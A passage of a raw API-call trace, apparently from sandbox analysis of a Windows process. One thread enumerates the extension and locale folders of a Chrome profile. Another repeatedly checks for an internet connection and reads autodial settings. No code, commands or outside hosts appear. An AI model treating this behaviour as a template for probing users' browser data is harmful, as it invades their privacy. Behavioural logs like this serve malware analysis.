\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,544 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,544 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,584 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:13,584 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:13,584 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:13,584 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:13,584 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:13,624 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\ro\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,624 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00y\xb3j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\x00y\xb3j\xe0\x91\xcf\x01\x00y\xb3j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00y\xb3j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xd5\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,624 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,624 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,704 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\ru\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,704 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x00\xb5j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x010\x00\xb5j\xe0\x91\xcf\x010\x00\xb5j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\xb5j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01 \x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,704 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,704 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,784 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\sk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,784 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x00\xb5j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x010\x00\xb5j\xe0\x91\xcf\x010\x00\xb5j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\xb5j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xdd\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,784 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,784 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,864 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\sl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,864 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x87\xb6j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01`\x87\xb6j\xe0\x91\xcf\x01`\x87\xb6j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x87\xb6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xda\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,864 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,864 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,945 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\sr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,945 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x87\xb6j\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01\x90\x0e\xb8j\xe0\x91\xcf\x01\x90\x0e\xb8j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x0e\xb8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\xf8\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,945 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,945 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,025 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\sv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:14,025 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x0e\xb8j\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01\x90\x0e\xb8j\xe0\x91\xcf\x01\x90\x0e\xb8j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x0e\xb8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\xd6\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,025 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,025 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,105 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\th\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:14,105 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x0e\xb8j\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01\xc0\x95\xb9j\xe0\x91\xcf\x01\xc0\x95\xb9j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x95\xb9j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,105 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,105 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,185 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\tr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:14,185 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x1c\xbbj\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01\xf0\x1c\xbbj\xe0\x91\xcf\x01\xf0\x1c\xbbj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x1c\xbbj\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\xe3\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,185 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,185 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x1c\xbbj\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01\xf0\x1c\xbbj\xe0\x91\xcf\x01\xf0\x1c\xbbj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u\x00k\x00ty_Scah\x00\x00\x00\x00\x00\x00\x00 \xa4\xbcj\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00v\x00i\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00 \xa4\xbcj\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,185 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,395 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:14,395 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:14,395 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:14,395 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:14,395 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:14,415 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\uk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:14,425 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x1c\xbbj\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01\xf0\x1c\xbbj\xe0\x91\xcf\x01\xf0\x1c\xbbj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x1c\xbbj\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x08\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,425 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,425 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,505 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\vi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:14,505 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xa4\xbcj\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \xa4\xbcj\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\xe1\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,505 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,505 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,585 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\zh_CN\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:14,585 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xa4\xbcj\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01 \xa4\xbcj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \xa4\xbcj\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\xce\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,585 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,585 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,666 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\zh_TW\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:14,666 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P+\xbej\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01P+\xbej\xe0\x91\xcf\x01P+\xbej\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P+\xbej\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\x80%\xd8j\xe0\x91\xcf\x01\xce\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,666 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,666 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,666 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,746 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_metadata\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:14,746 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb09\xc1j\xe0\x91\xcf\x01pV\xc7j\xe0\x91\xcf\x01\xb09\xc1j\xe0\x91\xcf\x01\xb09\xc1j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ty_Sca\x00\x00\x00\x00\x00\x00\x00\x00\xb09\xc1j\xe0\x91\xcf\x01\x88\xb7\xc1j\xe0\x91\xcf\x01\x00\xb6j\x16\x7f\x91\xcf\x01\xb09\xc1j\xe0\x91\xcf\x01\xfd\x1a\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x18\x00V\x00E\x00R\x00I\x00F\x00I\x00~\x001\x00.\x00J\x00S\x00O\x00v\x00e\x00r\x00i\x00f\x00i\x00e\x00d\x00_\x00c\x00o\x00n\x00t\x00e\x00n\x00t\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,746 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,746 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,746 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:14,756 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,836 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:14,836 | 504 | NtQueryDirectoryFile |
